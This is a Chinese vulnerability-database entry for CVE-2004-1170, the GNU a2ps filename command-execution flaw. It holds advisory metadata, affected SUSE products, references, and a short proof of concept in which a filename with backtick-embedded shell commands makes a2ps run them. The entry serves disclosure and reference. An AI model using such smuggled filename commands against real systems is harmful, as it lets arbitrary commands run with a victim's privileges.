a2ps filename 命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108137 漏洞类型 输入验证
发布时间 2004-08-24 更新时间 2006-05-08
CVE编号 CVE-2004-1170 CNNVD-ID CNNVD-200501-145
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/24406
https://www.securityfocus.com/bid/11025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-145
|漏洞详情
PostScript是一种适用于电子产业和桌面出版领域的页面描述语言和编程语言。a2ps是GNU计划开发的一款支持将任何类型的文件转换为PostScript文件的软件包。a2ps4.13版本存在命令执行漏洞。远程攻击者可通过包含Shell元字符的文件名执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/11025/info

Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.

An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.

Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well. 

$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'
|受影响的产品
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE Linux Enterprise Server 9 SuSE Linux 8
|参考资料

来源:BID
名称:11025
链接:http://www.securityfocus.com/bid/11025
来源:FULLDISC
名称:20040824a2psexecutingshellcommandsfromfilename
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1026.html
来源:XF
名称:gnu-a2ps-gain-privileges(17127)
链接:http://xforce.iss.net/xforce/xfdb/17127
来源:MISC
链接:http://www.securiteam.com/unixfocus/5MP0N2KDPA.html
来源:SUSE
名称:SUSE-SA:2004:034
链接:http://www.novell.com/linux/security/advisories/2004_34_xfree86_libs_xshared.html
来源:SECUNIA
名称:12375
链接:http://secunia.com/advisories/12375
来源:CONFIRM
名称:http://bugs.debian.org/283134
链接:http://bugs.debian.org/283134
来源:FEDORA
名称:FLSA:152870
链接:http://www.securityfocus.com/archive/1/archive/1/419765/100/0/threaded
来源:MANDRAKE
名称:MDKSA-2004:140
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2004:140
来源:SUNALERT
名称:57649
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-57649-1&searchclause=
来源:OPENPKG
名称:OpenPKG-SA-2005.003
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110598355226660&w=2